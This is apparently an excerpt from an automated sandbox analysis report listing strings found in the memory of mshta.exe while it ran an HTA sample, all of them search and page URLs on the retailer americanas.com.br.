Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537933006.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542489956.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540586764.0000000007943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548679681.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548308733.0000000007943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541042280.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/?utm_source=web_app_manifest
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/akam/13/7fa68b1e
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536542022.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.524234567.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/ar-condicionado-portatil
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536542022.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.524234567.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540262182.000000000444A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/ar-condicionado-split-9000-btus
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/arINQUEDO
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536542022.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.524234567.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/cesta-de-natal
Source: mshta.exe, 00000000.00000003.538457983.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548280086.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540049421.00000000052A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/cestaq
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536529821.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539906624.0000000005140000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/chocotone
Source: mshta.exe, 00000000.00000003.548553793.00000000079C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539645441.0000000007984000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540451503.00000000079C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538072268.0000000007982000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539776600.00000000079B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/chocotoneE
Source: mshta.exe, 00000000.00000003.548553793.00000000079C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539645441.0000000007984000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540451503.00000000079C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538072268.0000000007982000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539776600.00000000079B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/chocotonel
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484339848.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/fantasia-papai-noel
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540213633.0000000005164000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/galaxy-a14?c_bot=Customer-Categorized
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535518713.0000000005333000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/gorro-papai-noel
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/guarda-roupa-bergamo
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536529821.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484339848.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/guirlanda-de-natal
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536529821.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548679681.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484339848.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541042280.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539906624.0000000005140000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/panetone
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542171761.0000000007C86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536529821.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540463831.0000000007969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536957836.0000000007C86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/panetone-bauducco
Source: mshta.exe, 00000000.00000003.538457983.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548280086.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540049421.00000000052A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/pisca
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536529821.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484339848.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/pisca-pisca
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536542022.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.524234567.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540201462.0000000005D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/piscinas
Source: mshta.exe, 00000000.00000003.538457983.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548280086.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540049421.00000000052A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/presepio
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536529821.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/presepio-de-natal
Source: mshta.exe, 00000000.00000003.538457983.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548280086.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540049421.00000000052A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/whisky
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536542022.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.524234567.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540463831.0000000007969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/whisky-royal-salute
